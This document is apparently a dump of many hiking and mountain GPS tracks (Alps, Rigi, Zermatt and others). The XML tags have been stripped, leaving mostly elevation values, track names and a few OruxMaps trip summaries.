+1371.0 + + +1397.0 + + +1424.0 + + +1456.0 + + +1460.0 + + +1499.0 + + +1530.0 + + +1541.0 + + +1554.0 + + +1570.0 + + +1576.0 + + +1582.0 + + +1585.0 + + +1594.0 + + +1601.0 + + +1605.0 + + +1608.0 + + +1615.0 + + +1631.0 + + +1640.0 + + +1639.0 + + +1648.0 + + +1651.0 + + +1659.0 + + +1662.0 + + +1668.0 + + +1678.0 + + +1680.0 + + +1689.0 + + +1694.0 + + +1697.0 + + + +1698.0 + + +1701.0 + + + +1705.0 + + + +1708.0 + + + +1711.0 + + + +1717.0 + + + +1717.0 + + + + +1723.0 + + + +1725.0 + + + +1727.0 + + + +1730.0 + + + + +1739.0 + + + + +1741.0 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + + +Ludwigshöhe + + + + + + +3623.38 + + + +3735.19 + + + +3821.61 + + + +3865.1 + + + +3985.03 + + + +4009.31 + + + +4040.13 + + + +4072.59 + + + +4124.68 + + + +4141.66 + + + +4148.97 + + + +4172.86 + + + +4202.2 + + + +4223.34 + + + +4231.86 + + + +4272.01 + + + +4286.42 + + + +4282.03 + + + +4300.25 + + + +4306.96 + + + +4344.04 + + + +4312.75 + + + +4308.39 + + + +4302.49 + + + +4251.19 + + + +4251.98 + + + +4256.13 + + + +4251.84 + + + +4248.33 + + + +4107.98 + + + +4076.48 + + + +4033.77 + + + +4019.14 + + + +3918.57 + + + +3848.9 + + + +3760.21 + + + +3717.02 + + + +3696.65 + + + +3661.43 + + + +3650.44 + + + +3629.29 + + + +3632.67 + + + +3605.19 + + + +3597.8 + + + +3577.22 + + + +3536.49 + + + +3528.12 + + + +3496.71 + + + +3490.77 + + + +3485.81 + + + +3459.62 + + + +3459.35 + +" +" + + +Downloader: 2016-10-11T19:10:07 # 79523 # gpstracks # 79.199.23.110 +Touren-Titel + +Christian Steiner + + +GPS-Tracks.com + +http://www.GPS-Tracks.com + + + +70-0 Touren_Titel + + + + + + + +2726.0 + + + +2714.0 + + + +2714.0 + + + +2727.0 + + + +2740.0 + + + +2766.0 + + + +2790.0 + + + +2804.0 + + + +2820.0 + + + +2850.0 + + + +2878.0 + + + +2891.0 + + + +2955.0 + + + +2959.0 + + + +2982.0 + + + +3012.0 + + + +3068.0 + + + +3087.0 + + + +3088.0 + + + +3119.0 + + + +3162.0 + + + +3216.0 + + + +3224.0 + + + +3233.0 + + + +3231.0 + + + +3239.0 + + + +3244.0 + + + +3252.0 + + + +3269.0 + + + +3275.0 + + + +3298.0 + + + +3302.0 + + + +3315.0 + + + +3352.0 + + + +3398.0 + + + +3416.0 + + + +3424.0 + + + +3434.0 + + + +3455.0 + + + +3476.0 + + + +3508.0 + + + +3589.0 + + + +3643.0 + + + +3669.0 + + + +3703.0 + + + +3704.0 + + + +3710.0 + + + +3731.0 + + + +3734.0 + + + +3760.0 + + + +3788.0 + + + +3880.0 + + + +3892.0 + + + +3901.0 + + + +3915.0 + + + +3964.0 + + + +3968.0 + + + +3983.0 + +" +" + + +verenaschlucht, geführt + + + + + + +verenaschlucht, geführt + + + +459.79991284049777 + + +456.6 + + +459.2000795059057 + + +456.89999799907497 + + +458.3 + + +457.19999642573833 + + +457.1 + + +458.2000024671752 + + +459.0999933445369 + + +461.60001082674677 + + +465.4 + + +468.79999855476467 + + +470.5999811683176 + + +475.69998892764113 + + +479.4999959046646 + + +483.5999791040839 + + +488.99998768188004 + + +490.600000373319 + + +491.2 + + +497.59995586767826 + + +502.39984882936403 + + +493.29995243723425 + + +493.29999461442304 + + +499.79994607050514 + + +504.89999730516996 + + +504.4 + + +505.49999258612496 + + +504.2999930235563 + + +502.6000047395312 + + +505.39998809513077 + + +496.70006606477466 + + +474.8999376872744 + + +465.19994603075514 + + +459.4 +" +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + +1088.0 + + + +1088.0 + + + +1085.0 + + + +1087.0 + + + +1091.0 + + + +1115.0 + + + +1117.0 + + + +1114.0 + + + +1137.0 + + + +1150.0 + + + +1165.0 + + + +1183.0 + + + +1182.0 + + + +1203.0 + + + +1212.0 + + + +1226.0 + + + +1218.0 + + + +1220.0 + + + +1216.0 + + + +1229.0 + + + +1240.0 + + + +1247.0 + + + +1243.0 + + + +1251.0 + + + +1266.0 + + + +1273.0 + + + +1287.0 + + + +1285.0 + + + +1292.0 + + + +1324.0 + + + +1341.0 + + + +1369.0 + + + +1360.0 + + + +1392.0 + + + +1368.0 + + + +1385.0 + + + +1408.0 + + + +1413.0 + + + +1415.0 + + + +1421.0 + + + +1446.0 + + + +1440.0 + + + +1472.0 + + + +1491.0 + + + +1535.0 + + + +1518.0 + + + +1541.0 + + + +1557.0 + + + +1576.0 + + + +1591.0 + + + +1606.0 + + + +1620.0 + + + +1636.0 + + + +1677.0 + + + +1701.0 + + + +1710.0 + + + +1716.0 + + + +1716.0 + + + +1720.0 + + + +1721.0 + + + +1720.0 + + + +1718.0 + + + +1732.0 + + + +1750.0 + + + +1785.0 + + + +1785.0 + + + +1819.0 + + + +1851.0 + +" +" + + + + + + +GPS dump for www.flightlog.org + + + +Track 001 + + + +1015.2 + + + +997.0 + + + +997.0 + + + +995.1 + + + +996.0 + + + +1005.6 + + + +1007.1 + + + +1007.6 + + + +1014.8 + + + +1067.2 + + + +1091.2 + + + +1099.8 + + + +1110.9 + + + +1148.4 + + + +1159.4 + + + +1170.0 + + + +1178.2 + + + +1196.5 + + + +1205.6 + + + +1222.9 + + + +1247.4 + + + +1299.8 + + + +1323.8 + + + +1338.2 + + + +1339.7 + + + +1351.7 + + + +1355.6 + + + +1365.6 + + + +1395.4 + + + +1404.1 + + + +1411.8 + + + +1471.4 + + + +1476.2 + + + +1481.5 + + + +1504.1 + + + +1518.0 + + + +1538.7 + + + +1549.3 + + + +1580.0 + + + +1593.0 + + + +1598.3 + + + +1613.2 + + + +1623.3 + + + +1627.6 + + + +1652.1 + + + +1666.5 + + + +1688.6 + + + +1720.4 + + + +1732.4 + + + +1737.7 + + + +1761.7 + + + +1770.8 + + + +1788.1 + + + +1825.6 + + + +1867.9 + + + +1919.8 + + + +1941.5 + + + +1967.4 + + + +1975.1 + + + +2029.4 + + + +2031.4 + + + +2015.5 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + + +Belacker-11AUG12 + + + + + + +662.5507813 + + +685.859375 + + +691.4296875 + + +703.3632813 + + +727.8515625 + + +754.9882813 + + +773.9140625 + + +773.578125 + + +776.8007813 + + +779.234375 + + +781.3125 + + +777.5742188 + + +772.90625 + + +778.1796875 + + +793.0546875 + + +795.3945313 + + +808.8945313 + + +812.03125 + + +827.28125 + + +825.8164063 + + +843.8242188 + + +878.5195313 + + +916.4882813 + + +923.6601563 + + +954.8671875 + + +951.890625 + + +947.6484375 + + +966.8046875 + + +976.3242188 + + +975.6132813 + + +981.0429688 + + +981.6992188 + + +990.125 + + +997.578125 + + +1004.7734375 + + +1013.2421875 + + +1037.0 + + +1019.3007813 + + +997.28125 + + +988.5078125 + + +985.140625 + + +984.4375 + + +981.0 + + +981.0 + + +975.2578125 + + +971.609375 + + +959.5390625 + + +962.6054688 + + +963.7460938 + + +968.7929688 + + +963.7578125 + + +970.46875 + + +951.7851563 + + +933.3242188 + + +923.6484375 + + +922.2226563 + + +882.9453125 + + +862.0625 + + +823.5273438 + + +821.515625 + + +788.3242188 + + +751.3359375 + + +713.5429688 + + +695.2070313 + + +696.1328125 + + +680.9882813 + + +678.2578125 + + +682.8984375 + + +681.9492188 + + +669.5039063 + + +661.2773438 + + +657.1953125 + + +663.0039063 + + +662.5585938 +" +" + + + + + + + + +24H Monte Prealba + + + +617.8 + + + +631.2 + + + +642.8 + + + +650.2 + + + +662.0 + + + +665.2 + + + +680.0 + + + +699.6 + + + +713.0 + + + +722.0 + + + +729.6 + + + +733.0 + + + +743.4 + + + +772.2 + + + +782.8 + + + +795.2 + + + +804.0 + + + +814.0 + + + +819.4 + + + +841.4 + + + +854.8 + + + +859.4 + + + +861.2 + + + +891.6 + + + +900.2 + + + +929.4 + + + +959.8 + + + +984.4 + + + +1003.2 + + + +1029.8 + + + +1050.6 + + + +1066.2 + + + +1086.4 + + + +1096.8 + + + +1119.8 + + + +1133.2 + + + +1122.2 + + + +1105.2 + + + +1087.8 + + + +1084.6 + + + +1067.8 + + + +1047.8 + + + +1029.0 + + + +1015.8 + + + +1004.0 + + + +981.4 + + + +960.8 + + + +948.0 + + + +924.4 + + + +915.4 + + + +883.0 + + + +870.2 + + + +855.4 + + + +841.4 + + + +814.8 + + + +817.0 + + + +814.4 + + + +807.8 + + + +797.6 + + + +774.4 + + + +748.4 + + + +735.0 + + + +729.0 + + + +725.2 + + + +720.2 + + + +702.2 + + + +686.8 + + + +669.6 + + + +665.0 + + + +653.0 + + + +645.8 + + + +639.6 + + + +632.8 + + + +620.2 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +2016-01-16 08:53 + + + + + +OruxMaps + + + +2016-01-16 08:53 +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Nome: 2016-01-16 08:53</h2><br /><p>Orario inizio: 01/16/2016 08:57</p><p>Orario fine: 01/16/2016 14:01</p><p>Distanza: 5,1km (05:03)</p><p>Tempo movimento: 00:53</p><p>Velocità media: 1km/h</p><p>Velocità media mov.: 5,8km/h</p><p>Max. Velocità: 5,4km/h</p><p>Altitudine minima: 1798m</p><p>Altitudine massima: 2369m</p><p>Velocità di salita: 193,6m/h</p><p>Velocità di discesa: -358,2m/h</p><p>Dislivello positivo: 581m</p><p>Perdita di elevazione: -720m</p><p>Tempo di salita: 03:00</p><p>Tempo di discesa: 02:00</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Non definito + + + + + +1938.42 + + + +1862.58 + + + +1870.32 + + + +1894.74 + + + +1918.83 + + + +1931.42 + + + +1958.57 + + + +1968.29 + + + +1974.06 + + + +1978.13 + + + +1965.38 + + + +1931.64 + + + +1937.18 + + + +1935.23 + + + +1973.52 + + + +2004.35 + + + +2027.41 + + + +2067.51 + + + +2094.93 + + + +2120.98 + + + +2151.5 + + + +2173.33 + + + +2218.33 + + + +2228.46 + + + +2232.17 + + + +2258.19 + + + +2307.67 + + + +2337.66 + + + +2357.82 + + + +2369.8 + + + +2336.18 + + + +2314.08 + + + +2319.63 + + + +2309.86 + + + +2255.53 + + + +2239.11 + + + +2227.64 + + + +2221.63 + + + +2223.45 + + + +2189.47 + + + +2159.1 + + + +2134.88 + + + +2118.41 + + + +2098.6 + + + +2081.47 + + + +2070.22 + + + +2057.11 + + + +2042.42 + + + +2023.44 + + + +1975.37 + + + +1944.93 + + + +1923.9 + + + +1915.69 + + + +1906.22 + + + +1839.92 + + + +1814.17 + + + +1801.48 + + + +1803.78 + +" +" + + + + + + +Garmin International + + +21-AUG-15 12:34:19 + + + + + +2514.95 + + + +2508.7 + + + +2517.35 + + + +2521.68 + + + +2533.21 + + + +2543.79 + + + +2555.8 + + + +2570.22 + + + +2578.39 + + + +2604.35 + + + +2613.48 + + + +2620.69 + + + +2618.29 + + + +2614.92 + + + +2617.81 + + + +2617.81 + + + +2617.33 + + + +2610.6 + + + +2617.81 + + + +2629.82 + + + +2634.63 + + + +2650.01 + + + +2649.05 + + + +2631.27 + + + +2611.08 + + + +2641.84 + + + +2629.34 + + + +2625.5 + + + +2611.56 + + + +2604.35 + + + +2609.16 + + + +2611.56 + + + +2613.48 + + + +2614.92 + + + +2618.29 + + + +2620.69 + + + +2630.3 + + + +2609.16 + + + +2602.43 + + + +2606.75 + + + +2610.12 + + + +2609.64 + + + +2630.79 + + + +2648.09 + + + +2648.09 + + + +2636.07 + + + +2629.34 + + + +2616.85 + + + +2613.0 + + + +2615.88 + + + +2615.4 + + + +2619.73 + + + +2614.44 + + + +2602.43 + + + +2577.91 + + + +2554.36 + + + +2539.94 + + + +2530.81 + + + +2520.23 + + + +2514.95 + + + +2511.1 + + + +2506.29 + + + +2502.45 + +" +" + + + + + + +Garmin International + + + +2018-04-15 13:29:45 + + + + + + + + +422.12 + + + +421.77 + + + +426.03 + + + +436.44 + + + +456.71 + + + +481.8 + + + +497.06 + + + +506.36 + + + +531.31 + + + +547.17 + + + +567.69 + + + +571.42 + + + +584.0 + + + +589.86 + + + +596.35 + + + +626.42 + + + +632.75 + + + +642.37 + + + +721.41 + + + +746.17 + + + +779.43 + + + +811.24 + + + +851.33 + + + +910.71 + + + +901.67 + + + +932.96 + + + +964.46 + + + +1011.98 + + + +1062.03 + + + +1128.51 + + + +1111.54 + + + +1112.5 + + + +1108.61 + + + +1090.64 + + + +1086.74 + + + +1074.0 + + + +1067.72 + + + +1040.23 + + + +1001.93 + + + +976.72 + + + +949.75 + + + +931.04 + + + +920.89 + + + +913.38 + + + +907.84 + + + +901.22 + + + +872.01 + + + +854.92 + + + +845.13 + + + +834.71 + + + +815.59 + + + +718.49 + + + +693.69 + + + +645.58 + + + +633.32 + + + +615.14 + + + +600.55 + + + +594.5 + + + +574.5 + + + +561.13 + + + +534.85 + + + +513.59 + + + +492.95 + + + +485.05 + + + +463.16 + + + +484.35 + +" +" + + + + + + + + + +2016-07-12 18:01:03 + + + +2383.0 + + + + + +0.000000 + +2381.0 + + + + + +1.650318 + +2381.0 + + + + + +4.336128 + +2381.0 + + + + + +2.652008 + +2382.0 + + + + + +0.882782 + +2380.0 + + + + + +0.536560 + +2380.0 + + + + + +2.781204 + +2376.0 + + + + + +5.567352 + +2367.0 + + + + + +8.933197 + +2364.0 + + + + + +1.766357 + +2364.0 + + + + + +0.975830 + +2362.0 + + + + + +3.226990 + +2365.0 + + + + + +1.949951 + +2364.0 + + + + + +3.005066 + +2365.0 + + + + + +1.662476 + +2365.0 + + + + + +3.614136 + +2366.0 + + + + + +2.161377 + +2369.0 + + + + + +5.735474 + +2370.0 + + + + + +9.855957 + +2371.0 + + + + + +2.232300 + +2371.0 + + + + + +7.634277 + +2372.0 + + + + + +8.169678 + +2372.0 + + + + + +6.386108 + +2370.0 + + + + + +9.667114 + +2372.0 + + + + + +3.214233 + +2371.0 + + + + + +0.601929 + +2372.0 + + + + + +10.075317 + +2372.0 + + + + + +4.926025 + +2372.0 + + + + + +0.323730 + +2371.0 + + + + + +0.782837 + +2372.0 + + + + + +10.003174 + +2373.0 + + + + + +0.550049" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Obri Hrad + +dodovogel + +dodovogel on GPSies.com +GPSiesUserOnWeb + + +Obri Hrad on GPSies.com +trackOnWeb + + +round trip +214.0 +4201.899631769187 +871.0 +1014.0 +215.0 + +Obri Hrad on GPSies.com + +trackOnWeb + + +872.0 + + + +871.0 + + + +883.0 + + + +904.0 + + + +921.0 + + + +941.0 + + + +958.0 + + + +972.0 + + + +983.0 + + + +987.0 + + + +989.0 + + + +997.0 + + + +1008.0 + + + +1009.0 + + + +1014.0 + + + +1010.0 + + + +1006.0 + + + +975.0 + + + +972.0 + + + +968.0 + + + +961.0 + + + +959.0 + + + +961.0 + + + +963.0 + + + +981.0 + + + +996.0 + + + +992.0 + + + +996.0 + + + +988.0 + + + +985.0 + + + +983.0 + + + +982.0 + + + +981.0 + + + +981.0 + + + +976.0 + + + +982.0 + + + +984.0 + + + +984.0 + + + +980.0 + + + +976.0 + + + +981.0 + + + +980.0 + + + +975.0 + + + +972.0 + + + +969.0 + + + +955.0 + + + +931.0 + + + +939.0 + + + +942.0 + + + +969.0 + + + +975.0 + + + +980.0 + + + +983.0 + + + +985.0 + + + +988.0 + + + +996.0 + + + +992.0 + + + +966.0 + + + +941.0 + + + +921.0 + + + +903.0 + + + +883.0 + + + +871.0 + +" +" + + + + + + +Garmin International + + +22-DEC-16 13:28:25 + + + + + +15.52 + + + + + +28.5 + + + + + +43.4 + + + + + +43.4 + + + + + +59.74 + + + + + +92.42 + + + + + +115.5 + + + + + +145.78 + + + + + +169.33 + + + + + +183.75 + + + + + +192.4 + + + + + +213.55 + + + + + +222.68 + + + + + +229.41 + + + + + +244.79 + + + + + +252.48 + + + + + +251.04 + + + + + +253.44 + + + + + +256.33 + + + + + +259.21 + + + + + +255.37 + + + + + +252.48 + + + + + +244.79 + + + + + +239.51 + + + + + +236.62 + + + + + +236.62 + + + + + +233.26 + + + + + +230.37 + + + + + +229.89 + + + + + +227.97 + + + + + +228.45 + + + + + +226.53 + + + + + +213.55 + + + + + +161.16 + + + + + +148.66 + + + + + +135.68 + + + + + +123.67 + + + + + +103.48 + + + + + +95.79 + + + + + +70.79 + + + + + +65.03 + + + + + +44.84 + + + + + +36.67 + + + + + +30.42 + + + + + +27.53 + + + + + +28.5 + + + + + +28.5 + + + +" +" + + +Balmenhorn, 4164 m. - Copia.gpx + + + + +Garmin International + +2016-08-23 16:20:16 + + + +3619.53 + + + +3630.2 + + + +3623.69 + + + +3632.79 + + + +3646.42 + + + +3658.72 + + + +3668.75 + + + +3687.83 + + + +3736.27 + + + +3825.26 + + + +3902.8 + + + +3996.95 + + + +4018.47 + + + +4053.54 + + + +4077.02 + + + +4089.26 + + + +4137.42 + + + +4164.41 + + + +4175.47 + + + +4185.47 + + + +4171.02 + + + +4142.44 + + + +4065.57 + + + +4034.5 + + + +4016.94 + + + +3903.13 + + + +3839.7 + + + +3749.2 + + + +3713.96 + + + +3685.37 + + + +3672.74 + + + +3658.42 + + + +3647.33 + + + +3637.2 + + + +3639.79 + + + +3625.81 + + + +#fbaf00 +#1" +" + + + + + + +Garmin International + + +2015-07-31 17:43:41 + + + + + + +2466.09 + + + +2466.31 + + + +2456.33 + + + +2400.94 + + + +2373.47 + + + +2371.21 + + + +2345.79 + + + +2328.48 + + + +2281.27 + + + +2246.23 + + + +2229.18 + + + +2218.36 + + + +2196.53 + + + +2180.54 + + + +2115.97 + + + +2090.09 + + + +2060.51 + + + +2058.79 + + + +2058.05 + + + +2054.64 + + + +2047.21 + + + +2074.23 + + + +2072.02 + + + +2016.97 + + + +2010.36 + + + +2013.56 + + + +2052.34 + + + +2070.78 + + + +2082.65 + + + +2091.43 + + + +2101.16 + + + +2137.43 + + + +2138.74 + + + +2144.95 + + + +2169.87 + + + +2211.11 + + + +2237.19 + + + +2248.4 + + + +2283.68 + + + +2329.1 + + + +2330.79 + + + +2338.8 + + + +2378.92 + + + +2393.87 + + + +2413.21 + + + +2429.59 + + + +2457.58 + +" +" + + + + + + +Garmin International + + + +Stockberg 20140525 + + + + + + +1050.377685546875 + + + +1064.79736328125 + + + +1066.719970703125 + + + +1071.526611328125 + + + +1078.736572265625 + + + +1082.581787109375 + + + +1087.388427734375 + + + +1087.869140625 + + + +1097.00146484375 + + + +1100.846923828125 + + + +1112.382568359375 + + + +1120.553955078125 + + + +1120.0732421875 + + + +1131.12841796875 + + + +1141.22216796875 + + + +1143.144775390625 + + + +1147.951416015625 + + + +1164.2939453125 + + + +1178.23291015625 + + + +1187.365478515625 + + + +1187.365478515625 + + + +1193.614013671875 + + + +1217.16650390625 + + + +1222.934326171875 + + + +1243.121826171875 + + + +1262.348388671875 + + + +1297.917236328125 + + + +1305.607666015625 + + + +1318.58544921875 + + + +1377.22607421875 + + + +1386.8388671875 + + + +1403.662109375 + + + +1415.197998046875 + + + +1418.081787109375 + + + +1420.4853515625 + + + +1418.5625 + + + +1418.081787109375 + + + +1420.004638671875 + + + +1457.015380859375 + + + +1468.070556640625 + + + +1556.992431640625 + + + +1641.107666015625 + + + +1679.560546875 + + + +1711.2841796875 + + + +1744.93017578125 + + + +1755.985107421875 + + + +1757.427490234375 + +" +" + + +Punta 3220 + + + + + +OruxMaps + + + +Punta 3220 +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Nome: Punta 3220</h2><br /><p>Orario inizio: 08/12/2016 14:45</p><p>Orario fine: 08/12/2016 16:45</p><p>Distanza: 3,9km (02:00)</p><p>Tempo movimento: 01:16</p><p>Velocità media: 1,9km/h</p><p>Velocità media mov.: 3,1km/h</p><p>Max. Velocità: 5,7km/h</p><p>Altitudine minima: 2795m</p><p>Altitudine massima: 3220m</p><p>Velocità di salita: 404,9m/h</p><p>Velocità di discesa: -453,3m/h</p><p>Dislivello positivo: 428m</p><p>Perdita di elevazione: -410m</p><p>Tempo di salita: 01:03</p><p>Tempo di discesa: 00:54</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Non definito + + + + + +2827.04 + + + +2810.99 + + + +2844.62 + + + +2864.58 + + + +2873.12 + + + +2875.65 + + + +2879.79 + + + +2882.59 + + + +2888.85 + + + +2891.54 + + + +2910.29 + + + +2929.44 + + + +2928.61 + + + +2945.9 + + + +2943.65 + + + +2962.13 + + + +2986.12 + + + +3024.84 + + + +3055.4 + + + +3064.17 + + + +3076.78 + + + +3098.06 + + + +3102.59 + + + +3123.09 + + + +3132.59 + + + +3156.84 + + + +3220.79 + + + +3202.93 + + + +3193.22 + + + +3149.16 + + + +3128.21 + + + +3104.09 + + + +3094.07 + + + +3022.64 + + + +3004.38 + + + +2992.65 + + + +2966.11 + + + +2948.97 + + + +2945.64 + + + +2923.54 + + + +2877.35 + + + +2873.57 + + + +2855.69 + + + +2831.36 + + + +2831.84 + + + +2835.8 + + + +2823.37 + + + +2842.06 + + + +2846.09 + +" +" + + + + + + +Garmin International + + + +Percorso + + + +1915.56 + + + +1920.85 + + + +1930.95 + + + +1936.23 + + + +1942.48 + + + +1958.34 + + + +1965.55 + + + +1967.96 + + + +1961.23 + + + +2005.45 + + + +2037.65 + + + +2061.2 + + + +2088.12 + + + +2125.61 + + + +2140.99 + + + +2179.45 + + + +2193.87 + + + +2236.16 + + + +2273.66 + + + +2280.87 + + + +2308.26 + + + +2318.36 + + + +2324.12 + + + +2339.02 + + + +2362.58 + + + +2390.94 + + + +2414.01 + + + +2453.9 + + + +2462.07 + + + +2476.97 + + + +2506.77 + + + +2534.17 + + + +2565.42 + + + +2588.97 + + + +2661.55 + + + +2694.71 + + + +2698.08 + + + +2712.02 + + + +2744.22 + + + +2758.16 + + + +2756.24 + + + +2814.4 + + + +2843.24 + + + +2929.75 + + + +2989.36 + + + +3034.06 + + + +3053.77 + + + +3098.47 + + + +3107.12 + + + +3134.04 + + + +3142.21 + + + +3181.14 + + + +3181.62 + +" +" + + + + + + + +Venusberg +26 déc. 2015 10:24 am + + + +466.208 + + + +466.637 + + + +473.261 + + + +488.642 + + + +491.718 + + + +495.655 + + + +502.385 + + + +506.871 + + + +509.34 + + + +526.27 + + + +526.162 + + + +535.538 + + + +535.428 + + + +533.534 + + + +531.972 + + + +534.915 + + + +536.897 + + + +530.752 + + + +525.648 + + + +515.282 + + + +509.058 + + + +506.138 + + + +507.276 + + + +510.754 + + + +508.042 + + + +507.975 + + + +511.384 + + + +493.555 + + + +491.599 + + + +487.897 + + + +480.557 + + + +472.215 + + + +461.718 + + + +450.389 + + + +449.621 + + + +451.138 + + + +459.906 + + + +463.578 + + + +474.286 + + + +481.037 + + + +502.312 + + + +507.068 + + + +505.054 + + + +515.084 + + + +517.587 + + + +510.265 + + + +500.696 + + + +495.545 + + + +496.312 + + + + +" +" + + + + + + +Garmin International + + + +2017-01-01 09:11:12 + + + + + + +903.68 + + + +902.55 + + + +899.82 + + + +897.19 + + + +899.87 + + + +904.83 + + + +908.26 + + + +917.88 + + + +919.06 + + + +927.0 + + + +952.24 + + + +967.38 + + + +1010.81 + + + +1038.33 + + + +1071.67 + + + +1099.77 + + + +1109.29 + + + +1118.92 + + + +1126.36 + + + +1160.83 + + + +1165.54 + + + +1186.87 + + + +1194.79 + + + +1195.33 + + + +1207.74 + + + +1220.73 + + + +1227.87 + + + +1232.03 + + + +1243.29 + + + +1257.67 + + + +1267.64 + + + +1292.83 + + + +1314.37 + + + +1306.05 + + + +1305.42 + + + +1311.54 + + + +1318.36 + + + +1301.84 + + + +1309.57 + + + +1281.63 + + + +1254.89 + + + +1214.84 + + + +1185.1 + + + +1147.86 + + + +1144.23 + + + +1124.99 + + + +1111.21 + + + +1104.1 + + + +1093.69 + + + +1086.19 + + + +1083.62 + + + +1071.82 + + + +1054.98 + + + +1045.52 + + + +1026.29 + + + +1023.45 + + + +998.21 + + + +955.56 + + + +937.91 + + + +912.77 + + + +910.36 + + + +900.63 + + + +895.15 + + + +892.27 + + + +891.07 + + + +894.72 + + + +898.05 + +" +" + + +schlierewand + + + + + +OruxMaps + + + +schlierewand +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: schlierewand</h2><br /><p>Startzeit: 07/24/2015 07:43</p><p>Zielzeit: 07/24/2015 10:21</p><p>Strecke: 4,8km (02:37)</p><p>Bewegungszeit: 01:22</p><p>Ø-Geschwindigkeit: 1,8km/h</p><p>Netto-Geschwindigkeit: 3,5km/h</p><p>Max. Geschwindigkeit: 7,6km/h</p><p>Minimale Höhe: 1244m</p><p>Maximale Höhe: 2215m</p><p>Steig-Geschw.: 416,7m/h</p><p>Sink-Geschw.: -173,9m/h</p><p>Aufstieg: 979m</p><p>Abstieg: -35m</p><p>Steigzeit: 02:20</p><p>Sinkzeit: 00:12</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1250.84 + + + +1255.1 + + + +1266.34 + + + +1275.99 + + + +1277.99 + + + +1271.62 + + + +1266.95 + + + +1276.37 + + + +1279.73 + + + +1286.39 + + + +1301.11 + + + +1306.0 + + + +1307.44 + + + +1306.71 + + + +1318.37 + + + +1325.25 + + + +1329.75 + + + +1321.39 + + + +1333.92 + + + +1339.87 + + + +1333.89 + + + +1378.86 + + + +1368.62 + + + +1341.97 + + + +1428.35 + + + +1452.89 + + + +1503.5 + + + +1521.87 + + + +1553.75 + + + +1563.37 + + + +1580.77 + + + +1613.74 + + + +1621.51 + + + +1631.93 + + + +1678.84 + + + +1680.34 + + + +1701.83 + + + +1719.87 + + + +1725.4 + + + +1744.03 + + + +1749.86 + + + +1766.46 + + + +1819.11 + + + +1822.12 + + + +1863.6 + + + +1862.0 + + + +1874.82 + + + +1935.37 + + + +1946.37 + + + +1956.84 + + + +1973.76 + + + +2028.27 + + + +2065.5 + + + +2088.62 + + + +2139.88 + + + +2158.24 + + + +2209.27 + + + +2215.87 + +" +" + + + + + + + +Track 11.11.2015 - Rigi Hochflue + + + +1070.08 + + +1134.01 + + +1137.38 + + +1145.55 + + +1154.2 + + +1161.41 + + +1170.06 + + +1179.67 + + +1199.38 + + +1201.3 + + +1196.5 + + +1204.19 + + +1218.61 + + +1234.47 + + +1242.16 + + +1270.04 + + +1285.42 + + +1310.9 + + +1351.27 + + +1373.38 + + +1366.65 + + +1378.67 + + +1392.13 + + +1396.93 + + +1402.7 + + +1416.64 + + +1424.81 + + +1432.02 + + +1468.55 + + +1528.15 + + +1558.43 + + +1575.74 + + +1596.89 + + +1617.07 + + +1632.46 + + +1659.85 + + +1695.9 + + +1694.94 + + +1697.83 + + +1692.54 + + +1686.29 + + +1679.56 + + +1669.95 + + +1633.9 + + +1626.69 + + +1571.89 + + +1545.94 + + +1520.46 + + +1499.79 + + +1474.8 + + +1465.67 + + +1463.26 + + +1445.48 + + +1436.83 + + +1421.45 + + +1398.37 + + +1384.92 + + +1370.98 + + +1359.92 + + +1317.14 + + +1303.69 + + +1298.4 + + +1282.06 + + +1286.38 + + +1283.02 + + +1280.61 + + +1273.88 + + +1250.33 + + +1236.87 + + +1217.65 + + +1192.17 + + +1188.81 + + +1171.98 + + +1158.05 + + +1159.97 + + +1155.16 + + +1151.8 + + +1148.43 + + +1142.18 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + +2015-07-16 07:22:50 + + + + + + +1212.91 + + + +1222.2 + + + +1219.96 + + + +1215.49 + + + +1219.87 + + + +1235.21 + + + +1267.77 + + + +1281.35 + + + +1294.79 + + + +1304.22 + + + +1305.01 + + + +1306.88 + + + +1307.5 + + + +1313.78 + + + +1329.15 + + + +1358.7 + + + +1371.55 + + + +1385.95 + + + +1398.48 + + + +1423.13 + + + +1476.52 + + + +1505.35 + + + +1533.79 + + + +1558.39 + + + +1587.55 + + + +1618.18 + + + +1711.83 + + + +1733.75 + + + +1739.74 + + + +1739.5 + + + +1741.7 + + + +1743.8 + + + +1748.59 + +" +" + + + + + + +CompeGPS TEAM, SL + + + +Zermatt Täsch + + + +1620.9 + + + +1540.2 + + + +1550.7 + + + +1565.2 + + + +1557.9 + + + +1563.7 + + + +1601.2 + + + +1607.5 + + + +1610.3 + + + +1617.6 + + + +1617.6 + + + +1620.4 + + + +1623.8 + + + +1619.5 + + + +1612.8 + + + +1607.0 + + + +1600.7 + + + +1595.9 + + + +1555.1 + + + +1571.4 + + + +1573.3 + + + +1582.0 + + + +1568.1 + + + +1566.1 + + + +1570.9 + + + +1565.2 + + + 